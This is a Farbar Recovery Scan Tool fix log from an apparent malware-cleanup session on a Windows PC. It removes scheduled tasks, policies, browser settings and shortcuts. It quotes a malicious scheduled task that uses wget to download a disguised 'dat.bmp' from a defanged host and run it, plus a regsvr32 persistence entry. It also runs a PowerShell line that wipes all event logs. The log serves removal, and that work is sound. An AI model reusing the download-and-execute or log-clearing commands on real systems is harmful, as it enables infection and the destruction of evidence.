Fix result of Farbar Recovery Scan Tool (x64) Version: 21.01.2018 Ran by Kuba (26-01-2018 19:20:09) Run:1 Running from C:\Users\Kuba\Downloads Loaded Profiles: Kuba (Available Profiles: Kuba & UpdatusUser) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: GroupPolicy: Restriction <==== ATTENTION GroupPolicyUsers\S-1-5-21-3338460377-1035617240-3592817547-1001\User: Restriction <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - D:\ESET\ESET Smart Security\Mozilla Thunderbird => not found CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Internet Download Manager\IDMGCExt.crx 2018-01-26 18:13 - 2018-01-26 18:18 - 000000000 ____D C:\AdwCleaner CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> No File ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> No File ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File Task: {0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {12019626-691F-462A-877A-54009CA8FFE1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=KEy9HdgPlS;Nero_BurningROM2014-15.0.03900_trial.exe;1423482306 & start cmd /R dat.bmp <==== ATTENTION Task: {1DA05B72-C9FF-464B-86D9-3F8A33B4120C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {1FCB9178-9830-49C3-89F5-DC342024EE28} - System32\Tasks\{55F8496A-A085-4AAB-9E43-B090C3019AA4} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.dat" -a uninstallme 7522E4EA-1ACE-45A4-BBF9-129B9513C307 DeviceId=05f8e6e5-c3c4-050f-79c2-e538d8beee67 BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet Task: {2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218} - System32\Tasks\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_uninst.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {620A87CB-88AA-4B0D-9992-9FABA4DE2CDC} - System32\Tasks\FileFly => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION Task: {74DC3443-7AA0-4E36-9599-B74A9C5969A0} - System32\Tasks\{D19480A7-1C66-4718-A8E7-F7E7E50BF497} => C:\WINDOWS\system32\pcalua.exe -a "D:\FIFA 14\FIFA 14\ModdingWayInstaller.exe" -d "D:\FIFA 14\FIFA 14" Task: {770B9597-E2AE-4BB0-895C-A38B09C55C11} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {7DEA7A48-3471-400A-A2B0-5BA365DEA500} - System32\Tasks\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsPlugin Task: {7E8FE418-B5EF-446D-9293-4B095C5FB793} - System32\Tasks\{F7606602-E4E6-4ABA-B255-0B35486D49BB} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_code.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {8B46E8C1-AEFC-49D1-8522-02E4C45F912D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {9248F670-676C-4190-AB1A-44DD598710D2} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {9B4F6793-CF3F-4D89-8741-97367C230EE1} - System32\Tasks\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F} => C:\WINDOWS\system32\pcalua.exe -a D:\KMSpico\unins000.exe Task: {9E88CD04-A2E3-41EA-A63F-5E8F99686800} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E} - System32\Tasks\4B55B688-1080-8A52-689E-71FB723AAFC3 => C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/4ba6e1555c879c97 /q" "C:\Users\Kuba\AppData\Local\348936~1\{8BE76~1." Task: {C3B9D0C9-5271-42B1-A4CD-E31139294E43} - System32\Tasks\{19B825F8-9F85-4BF6-827A-627D610B159C} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsBing Task: {CFBF0E7F-1CBF-4855-82B0-6EDB908AF560} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {D4686AC8-5458-4B85-940E-907BCC7A1D35} - System32\Tasks\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsInstall Task: {DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: C:\WINDOWS\Tasks\FileFly.job => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352] AlternateDataStreams: C:\ProgramData\TEMP:D78D6FF7 [154] Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\Minecraft.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\unins000.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio\Android Studio.lnk -> D:\Android\Android Studio\bin\studio64.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\4\Program konfiguracyjny.lnk -> D:\Assassin's Creed\Detection\Detection.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\3\Instrukcja do gry.lnk -> D:\Assassin's Creed\Support\Manual\AssassinsCreed.pdf (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\2\CzytajTo.txt.lnk -> D:\Assassin's Creed\Support\ReadMe\CzytajTo.txt (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\1\Rejestruj.lnk -> D:\Assassin's Creed\Register\RegistrationReminder.exe (No File) Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\0\Graj.lnk -> D:\Assassin's Creed\AssassinsCreed_Launcher.exe (No File) C:\Users\Kuba\Desktop\Euro Truck Simulator 2.lnk C:\Users\Kuba\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk EmptyTemp: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: ***************** Processes closed successfully. Restore point was successfully created. C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully C:\WINDOWS\system32\GroupPolicyUsers\S-1-5-21-3338460377-1035617240-3592817547-1001\User => moved successfully "HKLM\SOFTWARE\Policies\Google" => removed successfully "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxySettingsPerUser" => removed successfully HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully "HKLM\Software\Wow6432Node\Mozilla\Thunderbird\Extensions\\eplgTb@eset.com" => removed successfully "HKLM\SOFTWARE\Google\Chrome\Extensions\ngpampappnmepgilojfohadhhmbhlaek" => removed successfully C:\AdwCleaner => moved successfully "HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}" => removed successfully "HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}" => removed successfully "HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}" => removed successfully "HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ FileSyncEx" => removed successfully HKLM\Software\Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => key not found "HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip" => removed successfully HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => key not found "HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64" => removed successfully HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => key not found "HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C}" => removed successfully HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => key not found "HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\ FileSyncEx" => removed successfully HKLM\Software\Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => key not found "HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip" => removed successfully HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => key not found HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF} => could not remove key. ErrorCode1: 0x00000002 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF}" => removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => key not found "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{12019626-691F-462A-877A-54009CA8FFE1}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12019626-691F-462A-877A-54009CA8FFE1}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E}" => removed successfully C:\WINDOWS\System32\Tasks\SYSTEM => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1DA05B72-C9FF-464B-86D9-3F8A33B4120C}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1DA05B72-C9FF-464B-86D9-3F8A33B4120C}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1FCB9178-9830-49C3-89F5-DC342024EE28}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1FCB9178-9830-49C3-89F5-DC342024EE28}" => removed successfully C:\WINDOWS\System32\Tasks\{55F8496A-A085-4AAB-9E43-B090C3019AA4} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{55F8496A-A085-4AAB-9E43-B090C3019AA4}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218}" => removed successfully C:\WINDOWS\System32\Tasks\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{620A87CB-88AA-4B0D-9992-9FABA4DE2CDC}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{620A87CB-88AA-4B0D-9992-9FABA4DE2CDC}" => removed successfully C:\WINDOWS\System32\Tasks\FileFly => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FileFly" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74DC3443-7AA0-4E36-9599-B74A9C5969A0}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74DC3443-7AA0-4E36-9599-B74A9C5969A0}" => removed successfully C:\WINDOWS\System32\Tasks\{D19480A7-1C66-4718-A8E7-F7E7E50BF497} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{D19480A7-1C66-4718-A8E7-F7E7E50BF497}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{770B9597-E2AE-4BB0-895C-A38B09C55C11}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{770B9597-E2AE-4BB0-895C-A38B09C55C11}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7DEA7A48-3471-400A-A2B0-5BA365DEA500}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7DEA7A48-3471-400A-A2B0-5BA365DEA500}" => removed successfully C:\WINDOWS\System32\Tasks\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E8FE418-B5EF-446D-9293-4B095C5FB793}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E8FE418-B5EF-446D-9293-4B095C5FB793}" => removed successfully C:\WINDOWS\System32\Tasks\{F7606602-E4E6-4ABA-B255-0B35486D49BB} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F7606602-E4E6-4ABA-B255-0B35486D49BB}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8B46E8C1-AEFC-49D1-8522-02E4C45F912D}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B46E8C1-AEFC-49D1-8522-02E4C45F912D}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9248F670-676C-4190-AB1A-44DD598710D2}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9248F670-676C-4190-AB1A-44DD598710D2}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9B4F6793-CF3F-4D89-8741-97367C230EE1}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9B4F6793-CF3F-4D89-8741-97367C230EE1}" => removed successfully C:\WINDOWS\System32\Tasks\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9E88CD04-A2E3-41EA-A63F-5E8F99686800}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9E88CD04-A2E3-41EA-A63F-5E8F99686800}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E}" => removed successfully C:\WINDOWS\System32\Tasks\4B55B688-1080-8A52-689E-71FB723AAFC3 => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4B55B688-1080-8A52-689E-71FB723AAFC3" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C3B9D0C9-5271-42B1-A4CD-E31139294E43}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3B9D0C9-5271-42B1-A4CD-E31139294E43}" => removed successfully C:\WINDOWS\System32\Tasks\{19B825F8-9F85-4BF6-827A-627D610B159C} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{19B825F8-9F85-4BF6-827A-627D610B159C}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CFBF0E7F-1CBF-4855-82B0-6EDB908AF560}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFBF0E7F-1CBF-4855-82B0-6EDB908AF560}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D4686AC8-5458-4B85-940E-907BCC7A1D35}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D4686AC8-5458-4B85-940E-907BCC7A1D35}" => removed successfully C:\WINDOWS\System32\Tasks\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => removed successfully C:\WINDOWS\Tasks\FileFly.job => moved successfully C:\ProgramData\TEMP => ":B755D674" ADS removed successfully C:\ProgramData\TEMP => ":D78D6FF7" ADS removed successfully "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft .lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall Minecraft .lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio\Android Studio.lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\4\Program konfiguracyjny.lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\3\Instrukcja do gry.lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\2\CzytajTo.txt.lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\1\Rejestruj.lnk" => Could not move. "C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\0\Graj.lnk" => Could not move. C:\Users\Kuba\Desktop\Euro Truck Simulator 2.lnk => moved successfully C:\Users\Kuba\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk => moved successfully ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= End of Powershell: ========= C:\Windows\System32\Drivers\etc\hosts => moved successfully Hosts restored successfully. =========== EmptyTemp: ========== BITS transfer queue => 7888896 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 39579571 B Java, Flash, Steam htmlcache => 94415 B Windows/system/drivers => 1239023 B Edge => 1846298 B Chrome => 55612978 B Firefox => 27559232 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 0 B LocalService => 0 B NetworkService => 245998 B Kuba => 1108216831 B UpdatusUser => 0 B RecycleBin => 0 B EmptyTemp: => 1.2 GB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 19:28:13 ====